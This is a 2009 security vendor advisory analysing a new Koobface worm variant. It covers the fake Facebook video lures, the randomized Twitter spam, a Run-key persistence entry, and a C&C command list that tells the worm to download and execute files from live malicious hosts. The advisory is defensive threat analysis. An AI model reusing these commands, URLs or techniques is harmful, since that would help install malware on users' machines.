New Koobface worm variant (Aug 11, 2009)

SonicWALL UTM Research team found a new variant of Koobface worm last week on August 7, 2009. It's packed using UPX.

There are three major enhancements in this new variant of Koobface,

a) Earlier drive-by sites had a page that looked like YouTube video page but now they have switched to a Facebook video look-alike page.

b) In past, the message tweeted was "My home video :) ", now they randomize it by adding "LOL", "HA-HA-HA", "OMFG!" etc, so each tweet is unique.

c) The link is also unique with an appended random number, so after URL shortening it is still unique:
hxxp://uppinorr.se/pub1icm0vies/? -> hxxp://bit.ly/

The malware performs following activities upon execution:

• Deletes the original file that was downloaded and executed by the user
• Drops files (Windows)ld12.exe, (Windows)prxid93ps.dat and executes ld12.exe
• Creates a registry entry to ensure that it starts on system reboot:
  HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunsysldtray: "c:windowsld12.exe"
• Checks for Internet connectivity by sending GET request to www.google.com
• If Internet is available, it connects to the C&C server located at upr0306.com and receives command to download malicious files:

  #PID=1000
  STARTONCEIMG|http://web.reg.md/1/p.jpg
  STARTONCE|http://web.reg.md/1/prx.exe
  START|http://web.reg.md/1/pp.10.exe
  #BLACKLABEL
  EXIT

This malware is also known as Worm:Win32/Koobface.gen!D , Net-Worm.Win32.Koobface.bgr , Mal/KoobHeur-A .

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Koobface.BGR (Worm) signature.

Screenshots of Koobface worm drive-by sites in action can be seen below:

Facebook video page look-alike:

Download of the Koobface worm when user attempts to download flash player:

Page showing unique tweets with shortened malicious link: